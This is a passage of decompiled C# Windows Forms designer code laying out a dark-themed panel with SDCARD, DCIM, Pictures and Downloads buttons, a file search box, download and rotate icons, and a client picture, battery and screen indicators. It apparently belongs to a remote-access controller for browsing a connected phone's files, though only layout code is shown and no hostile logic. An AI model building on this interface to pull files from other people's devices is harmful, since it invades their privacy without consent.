			this.ClearButton.Cursor = global::System.Windows.Forms.Cursors.Hand;
			this.ClearButton.FillColor = global::System.Drawing.Color.Black;
			this.ClearButton.FillHoverColor = global::System.Drawing.Color.FromArgb(20, 20, 20);
			this.ClearButton.FillPressColor = global::System.Drawing.Color.Black;
			this.ClearButton.FillSelectedColor = global::System.Drawing.Color.FromArgb(157, 5, 17);
			this.ClearButton.Font = new global::System.Drawing.Font("Microsoft Sans Serif", 12f);
			this.ClearButton.ForeColor = global::System.Drawing.Color.FromArgb(157, 5, 17);
			this.ClearButton.ForePressColor = global::System.Drawing.Color.FromArgb(157, 5, 17);
			this.ClearButton.Location = new global::System.Drawing.Point(10, 360);
			this.ClearButton.Name = "ClearButton";
			this.ClearButton.Radius = 25;
			this.ClearButton.RectColor = global::System.Drawing.Color.FromArgb(157, 5, 17);
			this.ClearButton.RectDisableColor = global::System.Drawing.Color.FromArgb(227, 242, 253);
			this.ClearButton.RectHoverColor = global::System.Drawing.Color.White;
			this.ClearButton.RectPressColor = global::System.Drawing.Color.White;
			this.ClearButton.RectSelectedColor = global::System.Drawing.Color.White;
			this.ClearButton.Size = new global::System.Drawing.Size(163, 26);
			this.ClearButton.Style = global::DrakeUI.Framework.UIStyle.Custom;
			this.ClearButton.TabIndex = 34;
			this.ClearButton.Text = "Clear";
			this.ClearButton.Visible = false;
			this.cancelbtn.Cursor = global::System.Windows.Forms.Cursors.Hand;
			this.cancelbtn.FillColor = global::System.Drawing.Color.Black;
			this.cancelbtn.FillHoverColor = global::System.Drawing.Color.FromArgb(20, 20, 20);
			this.cancelbtn.FillPressColor = global::System.Drawing.Color.Black;
			this.cancelbtn.FillSelectedColor = global::System.Drawing.Color.FromArgb(157, 5, 17);
			this.cancelbtn.Font = new global::System.Drawing.Font("Microsoft Sans Serif", 12f);
			this.cancelbtn.ForeColor = global::System.Drawing.Color.FromArgb(157, 5, 17);
			this.cancelbtn.ForePressColor = global::System.Drawing.Color.FromArgb(157, 5, 17);
			this.cancelbtn.Location = new global::System.Drawing.Point(10, 319);
			this.cancelbtn.Name = "cancelbtn";
			this.cancelbtn.Radius = 25;
			this.cancelbtn.RectColor = global::System.Drawing.Color.FromArgb(157, 5, 17);
			this.cancelbtn.RectDisableColor = global::System.Drawing.Color.FromArgb(227, 242, 253);
			this.cancelbtn.RectHoverColor = global::System.Drawing.Color.White;
			this.cancelbtn.RectPressColor = global::System.Drawing.Color.White;
			this.cancelbtn.RectSelectedColor = global::System.Drawing.Color.White;
			this.cancelbtn.Size = new global::System.Drawing.Size(163, 26);
			this.cancelbtn.Style = global::DrakeUI.Framework.UIStyle.Custom;
			this.cancelbtn.Symbol = 61534;
			this.cancelbtn.TabIndex = 33;
			this.cancelbtn.Text = "Stop";
			this.cancelbtn.Visible = false;
			this.DrakeWidth_W4.BackColor = global::System.Drawing.Color.FromArgb(157, 5, 17);
			this.DrakeWidth_W4.Location = new global::System.Drawing.Point(39, 403);
			this.DrakeWidth_W4.Name = "DrakeWidth_W4";
			this.DrakeWidth_W4.Size = new global::System.Drawing.Size(100, 1);
			this.DrakeWidth_W4.TabIndex = 32;
			this.DrakeWidth_W3.BackColor = global::System.Drawing.Color.FromArgb(157, 5, 17);
			this.DrakeWidth_W3.Location = new global::System.Drawing.Point(39, 222);
			this.DrakeWidth_W3.Name = "DrakeWidth_W3";
			this.DrakeWidth_W3.Size = new global::System.Drawing.Size(100, 1);
			this.DrakeWidth_W3.TabIndex = 31;
			this.DrakeWidth_W2.BackColor = global::System.Drawing.Color.FromArgb(157, 5, 17);
			this.DrakeWidth_W2.Location = new global::System.Drawing.Point(39, 171);
			this.DrakeWidth_W2.Name = "DrakeWidth_W2";
			this.DrakeWidth_W2.Size = new global::System.Drawing.Size(100, 1);
			this.DrakeWidth_W2.TabIndex = 30;
			this.viwimage.BackColor = global::System.Drawing.Color.Black;
			this.viwimage.Dock = global::System.Windows.Forms.DockStyle.Bottom;
			this.viwimage.Location = new global::System.Drawing.Point(0, 420);
			this.viwimage.Name = "viwimage";
			this.viwimage.Size = new global::System.Drawing.Size(179, 348);
			this.viwimage.SizeMode = global::System.Windows.Forms.PictureBoxSizeMode.Zoom;
			this.viwimage.TabIndex = 19;
			this.viwimage.TabStop = false;
			this.DrakeUIToolTip1.SetToolTip(this.viwimage, "Hover to play video");
			this.viwimage.Visible = false;
			this.usrscreen.Location = new global::System.Drawing.Point(114, 8);
			this.usrscreen.Margin = new global::System.Windows.Forms.Padding(3, 4, 3, 4);
			this.usrscreen.Name = "usrscreen";
			this.usrscreen.Size = new global::System.Drawing.Size(33, 33);
			this.usrscreen.SizeMode = global::System.Windows.Forms.PictureBoxSizeMode.Zoom;
			this.usrscreen.TabIndex = 14;
			this.usrscreen.TabStop = false;
			this.Usrbtry.Location = new global::System.Drawing.Point(75, 8);
			this.Usrbtry.Margin = new global::System.Windows.Forms.Padding(3, 4, 3, 4);
			this.Usrbtry.Name = "Usrbtry";
			this.Usrbtry.Size = new global::System.Drawing.Size(33, 33);
			this.Usrbtry.SizeMode = global::System.Windows.Forms.PictureBoxSizeMode.Zoom;
			this.Usrbtry.TabIndex = 17;
			this.Usrbtry.TabStop = false;
			this.sdbtn.Cursor = global::System.Windows.Forms.Cursors.Hand;
			this.sdbtn.FillColor = global::System.Drawing.Color.Black;
			this.sdbtn.FillHoverColor = global::System.Drawing.Color.FromArgb(20, 20, 20);
			this.sdbtn.FillPressColor = global::System.Drawing.Color.Black;
			this.sdbtn.FillSelectedColor = global::System.Drawing.Color.FromArgb(157, 5, 17);
			this.sdbtn.Font = new global::System.Drawing.Font("Microsoft Sans Serif", 12f);
			this.sdbtn.ForeColor = global::System.Drawing.Color.FromArgb(157, 5, 17);
			this.sdbtn.ForePressColor = global::System.Drawing.Color.FromArgb(157, 5, 17);
			this.sdbtn.Location = new global::System.Drawing.Point(11, 61);
			this.sdbtn.Name = "sdbtn";
			this.sdbtn.Radius = 25;
			this.sdbtn.RectColor = global::System.Drawing.Color.FromArgb(157, 5, 17);
			this.sdbtn.RectDisableColor = global::System.Drawing.Color.FromArgb(227, 242, 253);
			this.sdbtn.RectHoverColor = global::System.Drawing.Color.White;
			this.sdbtn.RectPressColor = global::System.Drawing.Color.White;
			this.sdbtn.RectSelectedColor = global::System.Drawing.Color.White;
			this.sdbtn.Size = new global::System.Drawing.Size(161, 26);
			this.sdbtn.Style = global::DrakeUI.Framework.UIStyle.Custom;
			this.sdbtn.Symbol = 61563;
			this.sdbtn.TabIndex = 24;
			this.sdbtn.Text = "SDCARD";
			this.dcmbtn.Cursor = global::System.Windows.Forms.Cursors.Hand;
			this.dcmbtn.FillColor = global::System.Drawing.Color.Black;
			this.dcmbtn.FillHoverColor = global::System.Drawing.Color.FromArgb(20, 20, 20);
			this.dcmbtn.FillPressColor = global::System.Drawing.Color.Black;
			this.dcmbtn.FillSelectedColor = global::System.Drawing.Color.FromArgb(157, 5, 17);
			this.dcmbtn.Font = new global::System.Drawing.Font("Microsoft Sans Serif", 12f);
			this.dcmbtn.ForeColor = global::System.Drawing.Color.FromArgb(157, 5, 17);
			this.dcmbtn.ForePressColor = global::System.Drawing.Color.FromArgb(157, 5, 17);
			this.dcmbtn.Location = new global::System.Drawing.Point(9, 93);
			this.dcmbtn.Name = "dcmbtn";
			this.dcmbtn.Radius = 25;
			this.dcmbtn.RectColor = global::System.Drawing.Color.FromArgb(157, 5, 17);
			this.dcmbtn.RectDisableColor = global::System.Drawing.Color.FromArgb(227, 242, 253);
			this.dcmbtn.RectHoverColor = global::System.Drawing.Color.White;
			this.dcmbtn.RectPressColor = global::System.Drawing.Color.White;
			this.dcmbtn.RectSelectedColor = global::System.Drawing.Color.White;
			this.dcmbtn.Size = new global::System.Drawing.Size(163, 26);
			this.dcmbtn.Style = global::DrakeUI.Framework.UIStyle.Custom;
			this.dcmbtn.Symbol = 61502;
			this.dcmbtn.TabIndex = 25;
			this.dcmbtn.Text = "DCIM";
			this.ClientPic.Location = new global::System.Drawing.Point(34, 8);
			this.ClientPic.Margin = new global::System.Windows.Forms.Padding(3, 4, 3, 4);
			this.ClientPic.Name = "ClientPic";
			this.ClientPic.Size = new global::System.Drawing.Size(35, 34);
			this.ClientPic.SizeMode = global::System.Windows.Forms.PictureBoxSizeMode.Zoom;
			this.ClientPic.TabIndex = 10;
			this.ClientPic.TabStop = false;
			this.picbtn.Cursor = global::System.Windows.Forms.Cursors.Hand;
			this.picbtn.FillColor = global::System.Drawing.Color.Black;
			this.picbtn.FillHoverColor = global::System.Drawing.Color.FromArgb(20, 20, 20);
			this.picbtn.FillPressColor = global::System.Drawing.Color.Black;
			this.picbtn.FillSelectedColor = global::System.Drawing.Color.FromArgb(157, 5, 17);
			this.picbtn.Font = new global::System.Drawing.Font("Microsoft Sans Serif", 12f);
			this.picbtn.ForeColor = global::System.Drawing.Color.FromArgb(157, 5, 17);
			this.picbtn.ForePressColor = global::System.Drawing.Color.FromArgb(157, 5, 17);
			this.picbtn.Location = new global::System.Drawing.Point(9, 125);
			this.picbtn.Name = "picbtn";
			this.picbtn.Radius = 25;
			this.picbtn.RectColor = global::System.Drawing.Color.FromArgb(157, 5, 17);
			this.picbtn.RectDisableColor = global::System.Drawing.Color.FromArgb(227, 242, 253);
			this.picbtn.RectHoverColor = global::System.Drawing.Color.White;
			this.picbtn.RectPressColor = global::System.Drawing.Color.White;
			this.picbtn.RectSelectedColor = global::System.Drawing.Color.White;
			this.picbtn.Size = new global::System.Drawing.Size(163, 26);
			this.picbtn.Style = global::DrakeUI.Framework.UIStyle.Custom;
			this.picbtn.Symbol = 62142;
			this.picbtn.TabIndex = 26;
			this.picbtn.Text = "Pictures";
			this.Downpic.Anchor = (global::System.Windows.Forms.AnchorStyles.Top | global::System.Windows.Forms.AnchorStyles.Right);
			this.Downpic.BackColor = global::System.Drawing.Color.Transparent;
			this.Downpic.BadgeAlignment = global::MetroSet_UI.Enums.BadgeAlign.TopRight;
			this.Downpic.BadgeText = "0";
			this.Downpic.DisabledBackColor = global::System.Drawing.Color.FromArgb(204, 204, 204);
			this.Downpic.DisabledBorderColor = global::System.Drawing.Color.FromArgb(155, 155, 155);
			this.Downpic.DisabledForeColor = global::System.Drawing.Color.FromArgb(136, 136, 136);
			this.Downpic.Font = new global::System.Drawing.Font("Segoe UI", 9f, global::System.Drawing.FontStyle.Bold);
			this.Downpic.HoverBadgeColor = global::System.Drawing.Color.FromArgb(85, 187, 245);
			this.Downpic.HoverBadgeTextColor = global::System.Drawing.Color.White;
			this.Downpic.HoverBorderColor = global::System.Drawing.Color.Teal;
			this.Downpic.HoverColor = global::System.Drawing.Color.Teal;
			this.Downpic.HoverTextColor = global::System.Drawing.Color.White;
			this.Downpic.IsDerivedStyle = true;
			this.Downpic.Location = new global::System.Drawing.Point(26, 230);
			this.Downpic.Margin = new global::System.Windows.Forms.Padding(3, 4, 3, 4);
			this.Downpic.Name = "Downpic";
			this.Downpic.NormalBadgeColor = global::System.Drawing.Color.FromArgb(65, 177, 225);
			this.Downpic.NormalBadgeTextColor = global::System.Drawing.Color.White;
			this.Downpic.NormalBorderColor = global::System.Drawing.Color.FromArgb(157, 5, 17);
			this.Downpic.NormalColor = global::System.Drawing.Color.Black;
			this.Downpic.NormalTextColor = global::System.Drawing.Color.FromArgb(157, 5, 17);
			this.Downpic.PressBadgeColor = global::System.Drawing.Color.FromArgb(45, 147, 205);
			this.Downpic.PressBadgeTextColor = global::System.Drawing.Color.White;
			this.Downpic.PressBorderColor = global::System.Drawing.Color.FromArgb(157, 5, 17);
			this.Downpic.PressColor = global::System.Drawing.Color.FromArgb(51, 51, 51);
			this.Downpic.PressTextColor = global::System.Drawing.Color.White;
			this.Downpic.Size = new global::System.Drawing.Size(153, 63);
			this.Downpic.Style = global::MetroSet_UI.Enums.Style.Custom;
			this.Downpic.StyleManager = null;
			this.Downpic.TabIndex = 20;
			this.Downpic.Tag = "off";
			this.Downpic.Text = "Downloads";
			this.Downpic.ThemeAuthor = "Narwin";
			this.Downpic.ThemeName = "MetroLite";
			this.Panel4.Controls.Add(this.DrakeUIButtonIcon8);
			this.Panel4.Controls.Add(this.DrakeUIButtonIcon7);
			this.Panel4.Controls.Add(this.DrakeUIButtonIcon6);
			this.Panel4.Dock = global::System.Windows.Forms.DockStyle.Bottom;
			this.Panel4.Location = new global::System.Drawing.Point(0, 768);
			this.Panel4.Name = "Panel4";
			this.Panel4.Size = new global::System.Drawing.Size(179, 82);
			this.Panel4.TabIndex = 21;
			this.DrakeUIButtonIcon8.Anchor = (global::System.Windows.Forms.AnchorStyles.Top | global::System.Windows.Forms.AnchorStyles.Right);
			this.DrakeUIButtonIcon8.Cursor = global::System.Windows.Forms.Cursors.Hand;
			this.DrakeUIButtonIcon8.FillColor = global::System.Drawing.Color.Black;
			this.DrakeUIButtonIcon8.FillHoverColor = global::System.Drawing.Color.FromArgb(20, 20, 20);
			this.DrakeUIButtonIcon8.FillPressColor = global::System.Drawing.Color.Black;
			this.DrakeUIButtonIcon8.FillSelectedColor = global::System.Drawing.Color.FromArgb(157, 5, 17);
			this.DrakeUIButtonIcon8.Font = new global::System.Drawing.Font("Microsoft Sans Serif", 12f);
			this.DrakeUIButtonIcon8.ForeColor = global::System.Drawing.Color.FromArgb(157, 5, 17);
			this.DrakeUIButtonIcon8.ForePressColor = global::System.Drawing.Color.FromArgb(157, 5, 17);
			this.DrakeUIButtonIcon8.IsCircle = true;
			this.DrakeUIButtonIcon8.Location = new global::System.Drawing.Point(36, 6);
			this.DrakeUIButtonIcon8.Name = "DrakeUIButtonIcon8";
			this.DrakeUIButtonIcon8.Radius = 0;
			this.DrakeUIButtonIcon8.RectColor = global::System.Drawing.Color.Transparent;
			this.DrakeUIButtonIcon8.RectDisableColor = global::System.Drawing.Color.Transparent;
			this.DrakeUIButtonIcon8.RectHoverColor = global::System.Drawing.Color.Transparent;
			this.DrakeUIButtonIcon8.RectPressColor = global::System.Drawing.Color.Transparent;
			this.DrakeUIButtonIcon8.RectSelectedColor = global::System.Drawing.Color.Transparent;
			this.DrakeUIButtonIcon8.Size = new global::System.Drawing.Size(33, 20);
			this.DrakeUIButtonIcon8.Style = global::DrakeUI.Framework.UIStyle.Custom;
			this.DrakeUIButtonIcon8.Symbol = 57439;
			this.DrakeUIButtonIcon8.TabIndex = 30;
			this.DrakeUIToolTip1.SetToolTip(this.DrakeUIButtonIcon8, "Downloads Folder");
			this.DrakeUIButtonIcon7.Anchor = (global::System.Windows.Forms.AnchorStyles.Top | global::System.Windows.Forms.AnchorStyles.Right);
			this.DrakeUIButtonIcon7.Cursor = global::System.Windows.Forms.Cursors.Hand;
			this.DrakeUIButtonIcon7.FillColor = global::System.Drawing.Color.Black;
			this.DrakeUIButtonIcon7.FillHoverColor = global::System.Drawing.Color.FromArgb(20, 20, 20);
			this.DrakeUIButtonIcon7.FillPressColor = global::System.Drawing.Color.Black;
			this.DrakeUIButtonIcon7.FillSelectedColor = global::System.Drawing.Color.FromArgb(157, 5, 17);
			this.DrakeUIButtonIcon7.Font = new global::System.Drawing.Font("Microsoft Sans Serif", 12f);
			this.DrakeUIButtonIcon7.ForeColor = global::System.Drawing.Color.FromArgb(157, 5, 17);
			this.DrakeUIButtonIcon7.ForePressColor = global::System.Drawing.Color.FromArgb(157, 5, 17);
			this.DrakeUIButtonIcon7.IsCircle = true;
			this.DrakeUIButtonIcon7.Location = new global::System.Drawing.Point(75, 7);
			this.DrakeUIButtonIcon7.Name = "DrakeUIButtonIcon7";
			this.DrakeUIButtonIcon7.Radius = 0;
			this.DrakeUIButtonIcon7.RectColor = global::System.Drawing.Color.Transparent;
			this.DrakeUIButtonIcon7.RectDisableColor = global::System.Drawing.Color.Transparent;
			this.DrakeUIButtonIcon7.RectHoverColor = global::System.Drawing.Color.Transparent;
			this.DrakeUIButtonIcon7.RectPressColor = global::System.Drawing.Color.Transparent;
			this.DrakeUIButtonIcon7.RectSelectedColor = global::System.Drawing.Color.Transparent;
			this.DrakeUIButtonIcon7.Size = new global::System.Drawing.Size(33, 20);
			this.DrakeUIButtonIcon7.Style = global::DrakeUI.Framework.UIStyle.Custom;
			this.DrakeUIButtonIcon7.Symbol = 61470;
			this.DrakeUIButtonIcon7.TabIndex = 29;
			this.DrakeUIToolTip1.SetToolTip(this.DrakeUIButtonIcon7, "Rotate Image");
			this.DrakeUIButtonIcon6.Anchor = (global::System.Windows.Forms.AnchorStyles.Top | global::System.Windows.Forms.AnchorStyles.Right);
			this.DrakeUIButtonIcon6.Cursor = global::System.Windows.Forms.Cursors.Hand;
			this.DrakeUIButtonIcon6.FillColor = global::System.Drawing.Color.Black;
			this.DrakeUIButtonIcon6.FillHoverColor = global::System.Drawing.Color.FromArgb(20, 20, 20);
			this.DrakeUIButtonIcon6.FillPressColor = global::System.Drawing.Color.Black;
			this.DrakeUIButtonIcon6.FillSelectedColor = global::System.Drawing.Color.FromArgb(157, 5, 17);
			this.DrakeUIButtonIcon6.Font = new global::System.Drawing.Font("Microsoft Sans Serif", 12f);
			this.DrakeUIButtonIcon6.ForeColor = global::System.Drawing.Color.FromArgb(157, 5, 17);
			this.DrakeUIButtonIcon6.ForePressColor = global::System.Drawing.Color.FromArgb(157, 5, 17);
			this.DrakeUIButtonIcon6.IsCircle = true;
			this.DrakeUIButtonIcon6.Location = new global::System.Drawing.Point(114, 7);
			this.DrakeUIButtonIcon6.Name = "DrakeUIButtonIcon6";
			this.DrakeUIButtonIcon6.Radius = 0;
			this.DrakeUIButtonIcon6.RectColor = global::System.Drawing.Color.Transparent;
			this.DrakeUIButtonIcon6.RectDisableColor = global::System.Drawing.Color.Transparent;
			this.DrakeUIButtonIcon6.RectHoverColor = global::System.Drawing.Color.Transparent;
			this.DrakeUIButtonIcon6.RectPressColor = global::System.Drawing.Color.Transparent;
			this.DrakeUIButtonIcon6.RectSelectedColor = global::System.Drawing.Color.Transparent;
			this.DrakeUIButtonIcon6.Size = new global::System.Drawing.Size(33, 20);
			this.DrakeUIButtonIcon6.Style = global::DrakeUI.Framework.UIStyle.Custom;
			this.DrakeUIButtonIcon6.Symbol = 61539;
			this.DrakeUIButtonIcon6.TabIndex = 28;
			this.DrakeUIToolTip1.SetToolTip(this.DrakeUIButtonIcon6, "Download Selected");
			this.clinumb.AutoSize = true;
			this.clinumb.ForeColor = global::System.Drawing.Color.Lime;
			this.clinumb.Location = new global::System.Drawing.Point(11, 52);
			this.clinumb.Name = "clinumb";
			this.clinumb.Size = new global::System.Drawing.Size(13, 19);
			this.clinumb.TabIndex = 19;
			this.clinumb.Text = " ";
			this.Timer1.Interval = 2500;
			this.Label2.AutoSize = true;
			this.Label2.Font = new global::System.Drawing.Font("Palatino Linotype", 20f, global::System.Drawing.FontStyle.Bold);
			this.Label2.Location = new global::System.Drawing.Point(3, 9);
			this.Label2.Name = "Label2";
			this.Label2.Size = new global::System.Drawing.Size(0, 46);
			this.Label2.TabIndex = 9;
			this.Panel2.BackColor = global::System.Drawing.Color.Black;
			this.Panel2.BorderStyle = global::System.Windows.Forms.BorderStyle.FixedSingle;
			this.Panel2.Controls.Add(this.pathtxt);
			this.Panel2.Controls.Add(this.clearsrchbtn);
			this.Panel2.Controls.Add(this.searchtext);
			this.Panel2.Controls.Add(this.searchbtn);
			this.Panel2.Controls.Add(this.clinumb);
			this.Panel2.Controls.Add(this.DrakeUIButtonIcon5);
			this.Panel2.Controls.Add(this.DrakeUIButtonIcon4);
			this.Panel2.Controls.Add(this.DrakeWidth_W1);
			this.Panel2.Controls.Add(this.Label2);
			this.Panel2.Controls.Add(this.PB);
			this.Panel2.Dock = global::System.Windows.Forms.DockStyle.Top;
			this.Panel2.Location = new global::System.Drawing.Point(179, 0);
			this.Panel2.Margin = new global::System.Windows.Forms.Padding(3, 4, 3, 4);
			this.Panel2.Name = "Panel2";
			this.Panel2.Size = new global::System.Drawing.Size(837, 51);
			this.Panel2.TabIndex = 8;
			this.pathtxt.Anchor = (global::System.Windows.Forms.AnchorStyles.Top | global::System.Windows.Forms.AnchorStyles.Left | global::System.Windows.Forms.AnchorStyles.Right);
			this.pathtxt.Cursor = global::System.Windows.Forms.Cursors.No;
			this.pathtxt.FillColor = global::System.Drawing.Color.White;
			this.pathtxt.FillDisableColor = global::System.Drawing.Color.Black;
			this.pathtxt.Font = new global::System.Drawing.Font("Roboto", 9f);
			this.pathtxt.ForeColor = global::System.Drawing.Color.Black;
			this.pathtxt.Location = new global::System.Drawing.Point(89, 9);
			this.pathtxt.Margin = new global::System.Windows.Forms.Padding(5, 6, 5, 6);
			this.pathtxt.Maximum = 2147483647.0;
			this.pathtxt.Minimum = -2147483648.0;
			this.pathtxt.Name = "pathtxt";
			this.pathtxt.Padding = new global::System.Windows.Forms.Padding(7, 6, 7, 6);
			this.pathtxt.ReadOnly = true;
			this.pathtxt.RectColor = global::System.Drawing.Color.FromArgb(157, 5, 17);
			this.pathtxt.RectDisableColor = global::System.Drawing.Color.Black;
			this.pathtxt.Size = new global::System.Drawing.Size(438, 26);
			this.pathtxt.Style = global::DrakeUI.Framework.UIStyle.Custom;
			this.pathtxt.StyleCustomMode = true;
			this.pathtxt.TabIndex = 29;
			this.pathtxt.TextAlignment = global::System.Drawing.ContentAlignment.MiddleLeft;
			this.clearsrchbtn.Anchor = (global::System.Windows.Forms.AnchorStyles.Top | global::System.Windows.Forms.AnchorStyles.Right);
			this.clearsrchbtn.AvatarSize = 25;
			this.clearsrchbtn.Cursor = global::System.Windows.Forms.Cursors.Hand;
			this.clearsrchbtn.FillColor = global::System.Drawing.Color.Black;
			this.clearsrchbtn.Font = new global::System.Drawing.Font("Microsoft Sans Serif", 12f);
			this.clearsrchbtn.ForeColor = global::System.Drawing.Color.FromArgb(157, 5, 17);
			this.clearsrchbtn.Location = new global::System.Drawing.Point(534, 9);
			this.clearsrchbtn.Margin = new global::System.Windows.Forms.Padding(4);
			this.clearsrchbtn.Name = "clearsrchbtn";
			this.clearsrchbtn.Size = new global::System.Drawing.Size(27, 26);
			this.clearsrchbtn.Style = global::DrakeUI.Framework.UIStyle.Custom;
			this.clearsrchbtn.StyleCustomMode = true;
			this.clearsrchbtn.Symbol = 77;
			this.clearsrchbtn.SymbolSize = 30;
			this.clearsrchbtn.TabIndex = 36;
			this.clearsrchbtn.Visible = false;
			this.searchtext.Anchor = (global::System.Windows.Forms.AnchorStyles.Top | global::System.Windows.Forms.AnchorStyles.Right);
			this.searchtext.Cursor = global::System.Windows.Forms.Cursors.IBeam;
			this.searchtext.FillColor = global::System.Drawing.Color.Black;
			this.searchtext.Font = new global::System.Drawing.Font("Roboto", 9f);
			this.searchtext.ForeColor = global::System.Drawing.Color.White;
			this.searchtext.Location = new global::System.Drawing.Point(570, 10);
			this.searchtext.Margin = new global::System.Windows.Forms.Padding(5, 6, 5, 6);
			this.searchtext.Maximum = 2147483647.0;
			this.searchtext.Minimum = -2147483648.0;
			this.searchtext.Name = "searchtext";
			this.searchtext.Padding = new global::System.Windows.Forms.Padding(7, 6, 7, 6);
			this.searchtext.Radius = 15;
			this.searchtext.RectColor = global::System.Drawing.Color.FromArgb(157, 5, 17);
			this.searchtext.RectDisableColor = global::System.Drawing.Color.FromArgb(227, 242, 253);
			this.searchtext.Size = new global::System.Drawing.Size(222, 26);
			this.searchtext.Style = global::DrakeUI.Framework.UIStyle.Custom;
			this.searchtext.StyleCustomMode = true;
			this.searchtext.TabIndex = 34;
			this.searchtext.Watermark = "Search By Name,Type,Date";
			this.searchbtn.Anchor = (global::System.Windows.Forms.AnchorStyles.Top | global::System.Windows.Forms.AnchorStyles.Right);
			this.searchbtn.AvatarSize = 25;
			this.searchbtn.Cursor = global::System.Windows.Forms.Cursors.Hand;
			this.searchbtn.FillColor = global::System.Drawing.Color.Black;
			this.searchbtn.Font = new global::System.Drawing.Font("Microsoft Sans Serif", 12f);
			this.searchbtn.ForeColor = global::System.Drawing.Color.FromArgb(157, 5, 17);
			this.searchbtn.Location = new global::System.Drawing.Point(798, 9);
			this.searchbtn.Margin = new global::System.Windows.Forms.Padding(4);
			this.searchbtn.Name = "searchbtn";
			this.searchbtn.Size = new global::System.Drawing.Size(33, 27);
			this.searchbtn.Style = global::DrakeUI.Framework.UIStyle.Custom;
			this.searchbtn.StyleCustomMode = true;
			this.searchbtn.Symbol = 85;
			this.searchbtn.SymbolSize = 30;
			this.searchbtn.TabIndex = 35;
			this.DrakeUIButtonIcon5.Cursor = global::System.Windows.Forms.Cursors.Hand;
			this.DrakeUIButtonIcon5.FillColor = global::System.Drawing.Color.Black;
			this.DrakeUIButtonIcon5.FillHoverColor = global::System.Drawing.Color.FromArgb(20, 20, 20);
			this.DrakeUIButtonIcon5.FillPressColor = global::System.Drawing.Color.Black;
			this.DrakeUIButtonIcon5.FillSelectedColor = global::System.Drawing.Color.FromArgb(157, 5, 17);
			this.DrakeUIButtonIcon5.Font = new global::System.Drawing.Font("Microsoft Sans Serif", 12f);
			this.DrakeUIButtonIcon5.ForeColor = global::System.Drawing.Color.FromArgb(157, 5, 17);
			this.DrakeUIButtonIcon5.ForePressColor = global::System.Drawing.Color.FromArgb(157, 5, 17);
			this.DrakeUIButtonIcon5.Location = new global::System.Drawing.Point(48, 10);
			this.DrakeUIButtonIcon5.Name = "DrakeUIButtonIcon5";
			this.DrakeUIButtonIcon5.Radius = 0;
			this.DrakeUIButtonIcon5.RectColor = global::System.Drawing.Color.Transparent;
			this.DrakeUIButtonIcon5.RectDisableColor = global::System.Drawing.Color.Transparent;
			this.DrakeUIButtonIcon5.RectHoverColor = global::System.Drawing.Color.Transparent;
			this.DrakeUIButtonIcon5.RectPressColor = global::System.Drawing.Color.Transparent;
			this.DrakeUIButtonIcon5.RectSelectedColor = global::System.Drawing.Color.Transparent;
			this.DrakeUIButtonIcon5.Size = new global::System.Drawing.Size(33, 26);
			this.DrakeUIButtonIcon5.Style = global::DrakeUI.Framework.UIStyle.Custom;
			this.DrakeUIButtonIcon5.Symbol = 61473;
			this.DrakeUIButtonIcon5.TabIndex = 28;
			this.DrakeUIButtonIcon4.CircleRectWidth = 2;
			this.DrakeUIButtonIcon4.Cursor = global::System.Windows.Forms.Cursors.Hand;
			this.DrakeUIButtonIcon4.FillColor = global::System.Drawing.Color.Black;
			this.DrakeUIButtonIcon4.FillHoverColor = global::System.Drawing.Color.FromArgb(20, 20, 20);
			this.DrakeUIButtonIcon4.FillPressColor = global::System.Drawing.Color.Black;
			this.DrakeUIButtonIcon4.FillSelectedColor = global::System.Drawing.Color.FromArgb(157, 5, 17);
			this.DrakeUIButtonIcon4.Font = new global::System.Drawing.Font("Microsoft Sans Serif", 12f);
			this.DrakeUIButtonIcon4.ForeColor = global::System.Drawing.Color.FromArgb(157, 5, 17);
			this.DrakeUIButtonIcon4.ForePressColor = global::System.Drawing.Color.FromArgb(157, 5, 17);
			this.DrakeUIButtonIcon4.Location = new global::System.Drawing.Point(9, 10);
			this.DrakeUIButtonIcon4.Name = "DrakeUIButtonIcon4";
			this.DrakeUIButtonIcon4.Radius = 0;
			this.DrakeUIButtonIcon4.RectColor = global::System.Drawing.Color.Transparent;
			this.DrakeUIButtonIcon4.RectDisableColor = global::System.Drawing.Color.Transparent;
			this.DrakeUIButtonIcon4.RectHoverColor = global::System.Drawing.Color.Transparent;
			this.DrakeUIButtonIcon4.RectPressColor = global::System.Drawing.Color.Transparent;
			this.DrakeUIButtonIcon4.RectSelectedColor = global::System.Drawing.Color.Transparent;
			this.DrakeUIButtonIcon4.Size = new global::System.Drawing.Size(33, 26);
			this.DrakeUIButtonIcon4.Style = global::DrakeUI.Framework.UIStyle.Custom;
			this.DrakeUIButtonIcon4.Symbol = 61608;
			this.DrakeUIButtonIcon4.TabIndex = 27;
			this.DrakeWidth_W1.BackColor = global::System.Drawing.Color.FromArgb(157, 5, 17);
			this.DrakeWidth_W1.Location = new global::System.Drawing.Point(10, 45);
			this.DrakeWidth_W1.Name = "DrakeWidth_W1";
			this.DrakeWidth_W1.Size = new global::System.Drawing.Size(800, 1);
			this.DrakeWidth_W1.TabIndex = 23;
			this.PB.Anchor = (global::System.Windows.Forms.AnchorStyles.Top | global::System.Windows.Forms.AnchorStyles.Left | global::System.Windows.Forms.AnchorStyles.Right);
			this.PB.ForeColor = global::System.Drawing.Color.FromArgb(157, 5, 17);
			this.PB.Location = new global::System.Drawing.Point(89, 9);
			this.PB.Margin = new global::System.Windows.Forms.Padding(3, 4, 3, 4);
			this.PB.Name = "PB";
			this.PB.Size = new global::System.Drawing.Size(438, 26);
			this.PB.TabIndex = 5;
			this.DrakeUIToolTip1.BackColor = global::System.Drawing.Color.White;
			this.DrakeUIToolTip1.Font = new global::System.Drawing.Font("Segoe UI", 8f, global::System.Drawing.FontStyle.Bold);
			this.DrakeUIToolTip1.ForeColor = global::System.Drawing.Color.FromArgb(157, 5, 17);
			this.DrakeUIToolTip1.OwnerDraw = true;
			this.DrakeUIToolTip1.TitleFont = new global::System.Drawing.Font("Segoe UI", 9f, global::System.Drawing.FontStyle.Bold);
			this.Timer2.Interval = 1000;
			base.AutoScaleDimensions = new global::System.Drawing.SizeF(8f, 19f);
			base.AutoScaleMode = global::System.Windows.Forms.AutoScaleMode.Font;
			this.BackColor = global::System.Drawing.Color.Black;
			base.ClientSize = new global::System.Drawing.Size(1016, 850);
			base.Controls.Add(this.Panel1);
			base.Controls.Add(this.Panel2);
			base.Controls.Add(this.Panel3);
			this.DoubleBuffered = true;
			this.Font = new global::System.Drawing.Font("Segoe UI", 8.25f, global::System.Drawing.FontStyle.Regular, global::System.Drawing.GraphicsUnit.Point, 0);
			this.ForeColor = global::System.Drawing.Color.White;
			base.Margin = new global::System.Windows.Forms.Padding(3, 4, 3, 4);
